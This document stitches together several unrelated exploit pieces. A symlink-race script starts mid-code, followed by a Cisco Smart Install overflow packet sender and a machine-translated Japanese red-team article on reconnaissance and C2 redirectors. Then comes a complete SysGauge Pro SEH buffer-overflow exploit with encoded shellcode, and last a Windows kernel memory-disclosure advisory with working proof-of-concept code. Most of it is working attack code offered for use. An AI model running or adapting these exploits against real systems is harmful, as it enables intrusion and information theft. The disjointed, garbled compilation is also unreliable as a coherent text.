timer = args.time_low
while True:
# Create original symlink
try:
os.remove(TMP_PATH)
except OSError:
pass
os.symlink("/dev/input/event0", TMP_PATH)
# Open subprocess
p = subprocess.Popen([args.path, "--device", TMP_PATH, "-l", "1", "-n", "-l", "2016356911"], stderr=devnull)
time.sleep(timer/2 / 1000000.0)
# Replace symlink
try:
os.remove(TMP_PATH)
except OSError:
pass
os.symlink(args.output, TMP_PATH)
time.sleep(timer/2 / 1000000.0)
# Trigger SIGINT
os.kill(p.pid, signal.SIGINT)
# Kill process if it's sill alive
time.sleep(200.0 / 1000000.0)
os.kill(p.pid, signal.SIGKILL)
# Verify result
with open(args.output, 'rb') as f:
data = f.read(4)
if data == b'/*/x':
print("Done!")
break
timer += 1
if timer > args.time_high:
timer = args.time_low
if __name__ == '__main__':
main()
# smi_ibc_init_discovery_BoF.py
import socket
import struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v
def send_packet(sock, packet):
sock.send(packet)
def receive(sock):
return sock.recv()
if __name__ == "__main__":
print "[*] Connecting to Smart Install Client ", options.target, "port", options.port
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.connect((options.target, options.port))
payload = 'BBBB' * 44 shellcode = 'D' * 2048
data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
tlv_1 = craft_tlv(0x00000001, data) tlv_2 = shellcode
hdr = '\x00\x00\x00\x01' # msg_from
hdr += '\x00\x00\x00\x01' # version
hdr += '\x00\x00\x00\x07' # msg_hdr_type
hdr += struct.pack('>I', len(data)) # data_length
pkt = hdr + tlv_1 + tlv_2
print "[*] Send a malicious packet"
send_packet(con, pkt)
0x00。レッドチームの建設目標は、ニュース放送と軍事ソリューションを聴くことです。軍事解決中に、赤と青の軍隊の間の対立を聞きます。情報セキュリティ業界では、軍隊との類似点があります。インターネットワールドレッドチームは攻撃者の側です。セキュリティ能力の改善は、セキュリティの脅威が発見される前に、犯罪、防御、対立の形にのみ反映されます。
Red Teamは、さまざまなレベルの安全性でのさまざまなシステムの浸透テストと安全手順に焦点を当てています。脆弱性を検出、防止、排除できます。 Red Teamは、会社または組織を攻撃する可能性のある実生活の攻撃を模倣し、攻撃者が使用する必要なすべての手順を実行します。攻撃者の役割を引き受けることにより、彼らは、サイバーセキュリティに脅威を与えるバックドアや搾取可能な脆弱性である可能性のある組織を示しています。
一般的な慣行は、レッドチームワークのために組織外の人々を雇うことです。誰かがセキュリティの脆弱性を活用するという知識を習得していますが、組織のインフラストラクチャに組み込まれた防御に気づいていません。
もちろん、エンタープライズセキュリティの建設の過程で、当社の企業は、基本的な防御と検出機能があり、この機能を継続的に検査および改善する必要がある場合にのみ、赤チームを構築する必要があります。
0x01。レッドチームのスキル1。レッドチームの主な特徴は、箱の外側を考えることです。会社の安全をよりよく保護するための新しいツールとテクノロジーを常に探しています。赤いチームであることは、タブーであるため、ある程度の反乱を抱えています。ルールと正当性を破りながら白い帽子のテクニックに従い、システムの欠陥を人々に示します。誰もがこれらを好むわけではありません。
2。攻撃されたシステムの詳細な理解は、Redチームがすべてのシステムを理解し、技術的な傾向に従うことが重要です。サーバーとデータベースを理解することで、脆弱性を見つける方法を見つけるためのより多くのオプションが得られます。
3.セキュリティツールの自動化機能独自のツールを開発する方法を理解することの利点は膨大です。ソフトウェアを書くには多くの練習と絶え間ない学習が必要であるため、それを使用して得られるスキルは、どんなレッドチームでも最高の攻撃戦術を実行するのに役立ちます。
4.浸透テスト浸透テストは、コンピューターとネットワークシステムに対する攻撃をシミュレートし、セキュリティの評価に役立ちます。脆弱性と包括的なリスク評価を提供する潜在的な脅威を特定します。浸透テストは、Redチームの重要な部分であり、その「標準」手順の一部です。また、白い帽子でもよく使用されます。
5.ソーシャルエンジニアリングあらゆる組織のセキュリティ監査を実行する場合、ヒューマンエラーはデータ侵害とリークの最も一般的な原因の1つであるため、機密データ侵害につながる可能性のある運用を実行するために人員を操作することが重要です。
0x02。レッドチームは、相手を攻撃する前にインフラストラクチャに侵入し、独自のインフラストラクチャを構築する必要があります。全体として、最初の部分、インテリジェンスコレクション、2番目の部分、C2アーキテクチャの2つの部分があります。
1.アクティブインテリジェンスコレクション:ターゲットドメイン名を収集し、ホストをスキャンし、Webシステムの脆弱性を収集し、
パッシブコレクション:Shodan、Google、Github、Maltego、その他のインテリジェンスを使用して収集します。
ソーシャルワーカーの収集:コーポレートメール、WeChat、Weiboなどの企業従業員に関する情報。
2。C2アーキテクチャの簡単な説明:C2は、ターゲットシステムの権限を取得した後、バックドアがシステムを持続することを意味します。施設のこの部分は、ペイロード生成システムと協力する必要があります。
現在の一般的な方法:DNSトンネルとHTTPトンネルによってアウトリーチされたC2システム。
C2トラフィックのリダイレクトの背後にある目的は2つのものです。緊急対応者が通信イベントを表示する場合、バックエンドチームサーバーを混乱させると、正当なWebサイトのようです。 Apache Mod_rewriteと[カスタムC2構成ファイルを使用することにより、調査トラフィックからの実際のC2トラフィックを確実にフィルタリングできます。
上記の「C2リダイレクト」に基づいてC2リダイレクトにHTTPSを使用して、別の方法は、リダイレクトサーバーにApacheのSSLプロキシエンジンを使用してインバウンドSSL要求を受け入れ、それらのリクエストをリバースHTTPSリスナーにプロキシにすることです。暗号化はすべてのフェーズで使用され、必要に応じてリダイレクターでSSL証明書を回転させることができます。
0x03。 REDチームの価値は、定量的侵入指標を通じてセキュリティ機能を改善し、セキュリティ製品チームがホストおよびネットワークベースの侵入検知システムの検出率を改善するのにも役立ちます。
from:https://www.4hou.com/penetration/17530.html
#!/usr/bin/python
##################################################################################################################
# Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sysgauge.com/ #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe #
# Tested on : Windows XP Professional - SP3 #
# Steps to reproduce : ~ Copy content of payload.txt #
# ~ Under Register type in "falafel" in Customer Name field #
# ~ Paste the content of payload.txt in Unlock Key field and click Register #
##################################################################################################################
import struct
# ***notes***
# ~ this particular function [Register] of the program only accept characters [00-7f] excluding "\x00\x09\x0a\x0d"
# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean address
# ~ the following are Flexense products effected by the same vulnerability (note buffer size and offsets may vary)
##################################################################################################################
# ~ SysGauge Ultimate v4.6.12
# ~ Azure DEX Pro v2.2.16
# ~ Azure DEX Ultimate v2.2.16
# ~ DiskBoss Pro v9.1.16
# ~ DiskBoss Ultimate v9.1.16
# ~ SyncBreeze Pro v10.7.14
# ~ SyncBreeze Ultimate v10.7.14
# ~ DiskPulse Pro v10.7.14
# ~ DiskPulse Ultimate v10.7.14
# ~ DiskSavvy Pro v10.7.14
# ~ DiskSavvy Ultimate v10.7.14
# ~ DiskSorter Pro v10.7.14
# ~ DiskSorter Ultimate v10.7.14
# ~ DupScout Pro v10.7.14
# ~ DupScout Ultimate v10.7.14
# ~ VX Search Pro v10.7.14
# ~ VX Search Ultimate v10.7.14
##################################################################################################################
# overwrite SEH with clean address of [pop, pop, ret]
buffer = "\x41" * 780 # junk to nSEH
buffer += "\x74\x06\x42\x42" # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<L', 0x10013d16) # SEH (pop esi # pop ecx # retn | [libdgg.dll])
buffer += "\x43" * 28 # some more junk
# push calc.exe instructions [encoded] into the stack
# Disassembly:
# 0: 33 c0 xor eax,eax # zero out eax register
# 2: 50 push eax # push eax (null-byte) to terminate "calc.exe"
# 3: 68 2E 65 78 65 push ".exe" # push the ASCII string to the stack
# 8: 68 63 61 6C 63 push "calc" #
# d: 8b c4 mov eax,esp # put the pointer to the ASCII string in eax
# f: 6a 01 push 0x1 # push uCmdShow parameter to the stack
# 11: 50 push eax # push the pointer to lpCmdLine to the stack
# 12: bb 5d 2b 86 7c mov ebx,0x7c862b5d # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx
# 17: ff d3 call ebx # call WinExec()
# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
# "\x33\xc0\x50\x68"
# "\x2e\x65\x78\x65"
# "\x68\x63\x61\x6C"
# "\x63\x8b\xc4\x6a"
# "\x01\x50\xbb\x5d"
# "\x2b\x86\x7c\xff"
# "\xd3\x90\x90\x90"
# starting from the bottom up in little endian order
# first push "\x90\x90\x90\xd3"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\xd3" into eax and push it to the stack
buffer += "\x05\x72\x70\x70\x70" ### add eax,0x70707072
buffer += "\x05\x61\x20\x20\x20" ### add eax,0x20202061
buffer += "\x50" ### push eax
##############################################################
# second push "\xff\x7c\x86\x2b"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\xff\x7c\x86\x2b" into eax and push it to the stack
buffer += "\x05\x01\x32\x35\x66" ### add eax,0x66353201
buffer += "\x05\x15\x32\x35\x66" ### add eax,0x66353215
buffer += "\x05\x15\x22\x12\x33" ### add eax,0x33122215
buffer += "\x50" ### push eax
##############################################################
# third push "\x5d\xbb\x50\x01"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x5d\xbb\x50\x01" into eax and push it to the stack
buffer += "\x05\x01\x30\x65\x36" ### add eax,0x36653001
buffer += "\x05\x01\x20\x56\x27" ### add eax,0x27562001
buffer += "\x48" ### dec eax
buffer += "\x50" ### push eax
##############################################################
# fourth push "\x6a\xc4\x8b\x63"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x6a\xc4\x8b\x63" into eax and push it to the stack
buffer += "\x05\x32\x46\x70\x35" ### add eax,0x35544632
buffer += "\x05\x31\x43\x70\x35" ### add eax,0x35704531
buffer += "\x50" ### push eax
##############################################################
# fifth push "\x6c\x61\x63\x68"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x6c\x61\x63\x68" into eax and push it to the stack
buffer += "\x05\x34\x32\x31\x36" ### add eax,0x36313234
buffer += "\x05\x34\x31\x30\x36" ### add eax,0x36303134
buffer += "\x50" ### push eax
##############################################################
# sixth push "\x65\x78\x65\x2e"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x65\x78\x65\x2e" into eax and push it to the stack
buffer += "\x05\x17\x33\x34\x33" ### add eax,0x33343317
buffer += "\x05\x17\x32\x44\x32" ### add eax,0x32443217
buffer += "\x50" ### push eax
##############################################################
# seventh push "\x68\x50\xc0\x33"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x68\x50\xc0\x33" into eax and push it to the stack
buffer += "\x05\x22\x60\x30\x34" ### add eax,0x34306022
buffer += "\x05\x11\x60\x20\x34" ### add eax,0x34206011
buffer += "\x50" ### push eax
##############################################################
# push 20 nops to the stack for padding
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\x90" into eax and push it to the stack
buffer += "\x05\x70\x70\x70\x70" ### add eax,0x70707070
buffer += "\x05\x20\x20\x20\x20" ### add eax,0x20202020
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
##############################################################
# push "jmp esp" address [encoded] to the stack
# 0x6709e053 : "\xff\xe4" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:\Program Files\SysGauge Pro\bin\QtCore4.dll)
# 0: 25 10 10 10 10 and eax,0x10101010
# 5: 25 01 01 01 01 and eax,0x1010101
# a: 05 31 70 03 34 add eax,0x34037031
# f: 05 22 70 06 33 add eax,0x33067022
# 14: 50 push eax
buffer += "\x25\x10\x10\x10\x10\x25\x01\x01\x01\x01\x05\x31\x70\x03\x34\x05\x22\x70\x06\x33\x50"
# the program converts "\xff" to "c3" [retn instruction] thus popping previously pushed to the stack address "jmp esp" to eip ;)
buffer += "\xff"
buffer += "C" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1) ### junk
try:
f=open("payload.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
/*
We have discovered that the nt!NtQueryFullAttributesFile system call invoked with paths of certain kernel objects discloses uninitialized kernel stack memory to user-mode clients. The vulnerability affects Windows 7 to 10, 32/64-bit. The paths that we have observed to trigger the leak in our test Windows 10 (1709) 64-bit VM are:
--- cut ---
"\GLOBAL??\D:\" (CD-ROM partition)
"\GLOBAL??\CdRom0\"
"\GLOBAL??\FltMgr"
"\GLOBAL??\FltMgr\"
"\GLOBAL??\MAILSLOT\"
"\GLOBAL??\Volume{GUID}\"
"\GLOBAL??\PIPE\"
"\Device\CdRom0\"
"\Device\NamedPipe\"
"\Device\Mailslot\"
--- cut ---
The output structure returned by the system call is FILE_NETWORK_OPEN_INFORMATION [1]:
--- cut ---
typedef struct _FILE_NETWORK_OPEN_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER AllocationSize;
LARGE_INTEGER EndOfFile;
ULONG FileAttributes;
} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
--- cut ---
It occupies 52 (0x34) bytes in memory, but due to alignment to an 8-byte boundary, it is effectively 0x56 (0x38) bytes long. In case of most of the above affected paths, the problem is that the 4 trailing bytes of padding are never initialized. As the kernel uses a temporary copy of the structure (allocated in the stack frame of nt!NtQueryFullAttributesFile) that is later passed to user-mode, the bug results in the disclosure of those 4 uninitialized kernel stack bytes. This can be observed by running the attached proof-of-concept program, which invokes nt!NtQueryFullAttributesFile against every object in the global object namespace, preceded by spraying the kernel stack with a 0x41 ('A') marker byte. Relevant parts of the output are shown below:
--- cut ---
Name: \GLOBAL??\D:\, Status: 0
00000000: 80 08 4a 06 66 46 d3 01 00 00 00 00 00 00 00 00 ..J.fF..........
00000010: 80 08 4a 06 66 46 d3 01 80 08 4a 06 66 46 d3 01 ..J.fF....J.fF..
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \GLOBAL??\CdRom0\, Status: 0
00000000: 80 08 4a 06 66 46 d3 01 00 00 00 00 00 00 00 00 ..J.fF..........
00000010: 80 08 4a 06 66 46 d3 01 80 08 4a 06 66 46 d3 01 ..J.fF....J.fF..
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \GLOBAL??\MAILSLOT\, Status: 0
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \GLOBAL??\Volume{GUID}\, Status: 0
00000000: 80 08 4a 06 66 46 d3 01 00 00 00 00 00 00 00 00 ..J.fF..........
00000010: 80 08 4a 06 66 46 d3 01 80 08 4a 06 66 46 d3 01 ..J.fF....J.fF..
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \GLOBAL??\PIPE\, Status: 0
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \Device\CdRom0\, Status: 0
00000000: 80 08 4a 06 66 46 d3 01 00 00 00 00 00 00 00 00 ..J.fF..........
00000010: 80 08 4a 06 66 46 d3 01 80 08 4a 06 66 46 d3 01 ..J.fF....J.fF..
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \Device\NamedPipe\, Status: 0
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \Device\Mailslot\, Status: 0
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
--- cut ---
In case of the \GLOBAL??\FltMgr device, the entire 56-byte memory area remains uninitialized, and is copied in that form to user-mode. See below:
--- cut ---
Name: \GLOBAL??\FltMgr, Status: 0
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........
Name: \GLOBAL??\FltMgr\, Status: 0
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
#pragma comment(lib, "ntdll.lib")
#define DIRECTORY_QUERY 0x0001
#define DIRECTORY_TRAVERSE 0x0002
typedef struct _FILE_NETWORK_OPEN_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER AllocationSize;
LARGE_INTEGER EndOfFile;
ULONG FileAttributes;
} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
typedef struct _OBJECT_DIRECTORY_INFORMATION {
UNICODE_STRING Name;
UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;
extern "C" {
NTSTATUS NTAPI NtQueryFullAttributesFile(
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Out_ PFILE_NETWORK_OPEN_INFORMATION FileInformation
);
NTSTATUS WINAPI NtQueryDirectoryObject(
_In_ HANDLE DirectoryHandle,
_Out_opt_ PVOID Buffer,
_In_ ULONG Length,
_In_ BOOLEAN ReturnSingleEntry,
_In_ BOOLEAN RestartScan,
_Inout_ PULONG Context,
_Out_opt_ PULONG ReturnLength
);
NTSTATUS WINAPI NtOpenDirectoryObject(
_Out_ PHANDLE DirectoryHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes
);
};
VOID PrintHex(PVOID Buffer, ULONG dwBytes) {
PBYTE Data = (PBYTE)Buffer;
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
static bool initialized = false;
static HPALETTE(*EngCreatePalette)(
_In_ ULONG iMode,
_In_ ULONG cColors,
_In_ ULONG *pulColors,
_In_ FLONG flRed,
_In_ FLONG flGreen,
_In_ FLONG flBlue
);
if (!initialized) {
EngCreatePalette = (HPALETTE(*)(ULONG, ULONG, ULONG *, FLONG, FLONG, FLONG))GetProcAddress(LoadLibrary(L"gdi32.dll"), "EngCreatePalette");
initialized = true;
}
static ULONG buffer[256];
MyMemset((PBYTE)buffer, 'A', sizeof(buffer));
EngCreatePalette(1, ARRAYSIZE(buffer), buffer, 0, 0, 0);
MyMemset((PBYTE)buffer, 'B', sizeof(buffer));
}
VOID QueryFile(HANDLE RootDirectory, PCWSTR Path) {
OBJECT_ATTRIBUTES Attributes;
UNICODE_STRING Name;
RtlInitUnicodeString(&Name, Path);
InitializeObjectAttributes(&Attributes, &Name, OBJ_CASE_INSENSITIVE, RootDirectory, NULL);
FILE_NETWORK_OPEN_INFORMATION FileInformation, EmptyInformation;
RtlZeroMemory(&FileInformation, sizeof(FileInformation));
RtlZeroMemory(&EmptyInformation, sizeof(EmptyInformation));
SprayKernelStack();
NTSTATUS Status = NtQueryFullAttributesFile(&Attributes, &FileInformation);
if (memcmp(&FileInformation, &EmptyInformation, sizeof(FileInformation)) != 0) {
wprintf(L"Name: %s, Status: %x\n", Path, Status);
PrintHex(&FileInformation, sizeof(FileInformation));
}
}
VOID EnumerateDirectory(PWCHAR path) {
HANDLE hdir = NULL;
OBJECT_ATTRIBUTES attrs;
UNICODE_STRING name;
RtlInitUnicodeString(&name, path);
InitializeObjectAttributes(&attrs, &name, 0, NULL, NULL);
NTSTATUS st = NtOpenDirectoryObject(&hdir, DIRECTORY_QUERY | DIRECTORY_TRAVERSE, &attrs);
if (NT_SUCCESS(st)) {
CONST ULONG kMaxBufferSize = 128 * 1024;
PBYTE buffer = (PBYTE)malloc(kMaxBufferSize);
ULONG Context;
st = NtQueryDirectoryObject(hdir, buffer, kMaxBufferSize, FALSE, TRUE, &Context, NULL);
if (NT_SUCCESS(st)) {
POBJECT_DIRECTORY_INFORMATION pdi = (POBJECT_DIRECTORY_INFORMATION)buffer;
while (pdi->Name.Buffer != NULL) {
WCHAR path_buffer[MAX_PATH];
if (!wcscmp(path, L"\\")) {
wsprintf(path_buffer, L"%s%s", path, pdi->Name.Buffer);
}
else {
wsprintf(path_buffer, L"%s\\%s", path, pdi->Name.Buffer);
}
if (!wcscmp(pdi->TypeName.Buffer, L"Directory")) {
EnumerateDirectory(path_buffer);
}
else {
QueryFile(NULL, path_buffer);
wcscat_s(path_buffer, L"\\");
QueryFile(NULL, path_buffer);
}
pdi++;
}
}
free(buffer);
NtClose(hdir);
}
}
int main() {
EnumerateDirectory(L"\\");
return 0;
}